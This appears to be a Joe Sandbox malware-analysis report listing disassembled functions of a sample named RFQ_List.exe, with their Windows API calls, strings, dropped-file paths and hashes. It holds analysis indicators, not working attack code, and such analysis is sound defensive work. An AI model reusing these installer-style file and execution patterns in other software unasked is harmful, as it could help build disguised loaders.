Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes$Space required:
API String ID: 2624150263-2062246113
Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 6f386f7cffff390e3bfd420b1b91f24d00af43437859eb11e11d3a2aab866b7e
Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
Opcode Fuzzy Hash: 6f386f7cffff390e3bfd420b1b91f24d00af43437859eb11e11d3a2aab866b7e
Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

Function 0040686A Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04

Function 00407041 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95

Function 004042B6 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
GetDlgItem.USER32(?,000003E8), ref: 00404368
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
GetSysColor.USER32(?), ref: 00404396
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
lstrlenW.KERNEL32(?), ref: 004043B7
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
GetDlgItem.USER32(?,0000040A), ref: 00404432
SendMessageW.USER32(00000000), ref: 00404439
GetDlgItem.USER32(?,000003E8), ref: 00404464
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
SetCursor.USER32(00000000), ref: 004044B8
ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
SetCursor.USER32(00000000), ref: 004044DC
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D

Strings

N, xrefs: 00404452
-B@, xrefs: 004044C2
Space required: , xrefs: 00404493
open, xrefs: 004044C5

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: -B@$N$Space required: $open
API String ID: 3615053054-3693965759
Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4

Function 00405D84 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0

Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
wsprintfA.USER32 ref: 00405DFB
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
GlobalFree.KERNEL32(00000000), ref: 00405EE4
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB

Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RFQ_List.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

Strings

[Rename], xrefs: 00405E65, 00405E77
NUL, xrefs: 00405D8D
%ls=%ls, xrefs: 00405DF1

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD

Function 004062E9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ_List.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
CharNextW.USER32(0040A300,"C:\Users\user\Desktop\RFQ_List.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373

Strings

*?|<>/":, xrefs: 0040633B
C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
"C:\Users\user\Desktop\RFQ_List.exe", xrefs: 0040632D

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\RFQ_List.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4120102305
Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED

Function 00404180 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040419D
GetSysColor.USER32(00000000), ref: 004041B9
SetTextColor.GDI32(?,00000000), ref: 004041C5
SetBkMode.GDI32(?,?), ref: 004041D1
GetSysColor.USER32(?), ref: 004041E4
SetBkColor.GDI32(?,?), ref: 004041F4
DeleteObject.GDI32(?), ref: 0040420E
CreateBrushIndirect.GDI32(?), ref: 00404218

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

Function 004051B4 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D8A2,74DF23A0), ref: 0040520F
SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8

Function 00404A7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
GetMessagePos.USER32 ref: 00404AA1
ScreenToClient.USER32(?,?), ref: 00404ABB
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3

Strings

f, xrefs: 00404ACF

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(00026800,00000064,000E27F8), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

